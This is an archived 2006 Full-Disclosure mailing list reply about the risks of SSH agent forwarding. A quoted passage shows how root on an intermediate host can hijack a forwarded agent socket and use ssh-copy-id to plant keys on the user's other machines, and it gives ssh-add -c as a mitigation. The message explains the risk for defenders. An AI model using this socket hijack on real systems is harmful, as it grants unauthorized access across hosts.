Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security FullDisclosure
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

Re: [Full-disclosure] Tech Tip: An Illustrated Guide to SSH Agent Forwar

from [Raj Mathur] Network Security [Permanent Link]
Subject: Re: [Full-disclosure] Tech Tip: An Illustrated Guide to SSH Agent Forwarding
Date: Sat, 25 Feb 2006 00:13:02 +0530 
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1


"Andrew" == Andrew McGill <andrew2005@ledge.co.za> writes:


    Andrew> Here's something you missed in the "Cons" section of agent
    Andrew> forwarding:

    Andrew>   lala@local: ssh-add lala@local: (enter key) lala@local:
    Andrew> ssh -A customer

    Andrew>     lala@customer: ssh remote

    Andrew>       lala@remote: sleep 86400

    Andrew> And while you are sleeping: root@customer does this:
    Andrew> export SSH_AUTH_SOCK=`find /tmp -user lala -name 'agent.*'
    Andrew> | head -1` ssh-copy-id lala@remote ssh-copy-id lala@local
    Andrew> ssh-copy-id lala@othercustomer ssh-copy-id lala@lalaland

    Andrew> (Oops) (that's a lot easier than subverting ssh to insert
    Andrew> something evil into the stream that will hack into the
    Andrew> remote)

    Andrew> If there are untrusted machines involved you may prefer
    Andrew> this:

    Andrew>   ssh-add -c

    Andrew> Note that ssh-agent does not identify the origin of
    Andrew> requests for authentication (a bug?), so its confirmation
    Andrew> is not fail-safe.

You can also add in the Pros of using key-based authentication:

If you have multiple administrators for a server farm, grant them only
key-based authentication.  Then when an administrator leaves the
company (or is redeployed within the organisation), you only need to
delete her key from authorized_keys and she's immediately locked out
of the servers.  The older method was to change the password on each
server (painful) and communicate the batch of new passwords to the
remaining administrators (insecure).

Regards,

- -- Raju
- -- 
Raj Mathur                raju@kandalaya.org      http://kandalaya.org/
       GPG: 78D4 FC67 367F 40E2 0DD5  0FEF C968 D0EF CC68 D17F
                      It is the mind that moves
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2 (GNU/Linux)
Comment: Processed by Mailcrypt 3.5.8 <http://mailcrypt.sourceforge.net/>

iD8DBQFD/1O1yWjQ78xo0X8RAmSNAJ0SeYBaLi4MTdUalq7bzrgTNR3uDgCdHksG
h9M/d2puAYt6QFqjcvAEaew=
=kBYi
-----END PGP SIGNATURE-----
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[More with this subject...]




<Prev in Thread] Current Thread [Next in Thread>
Previous by Date:  Re: [Full-disclosure] Pod Slurping Code, Jorrit Kronjee
Next by Date:  [Full-disclosure] iDefense Security Advisory 02.24.06: SCO Unixware Setuid ptrace Local Privilege Escalation Vulnerability, labs-no-reply
Previous by Thread:  Re: [Full-disclosure] Tech Tip: An Illustrated Guide to SSH Agent Forwarding, Andrew McGill
Next by Thread:  RE: [Full-disclosure] Mozilla Thunderbird : Remote Code Execution& Denial of Service, Todd Towles
Indexes:  [Date] [Thread] [Top] [All Lists]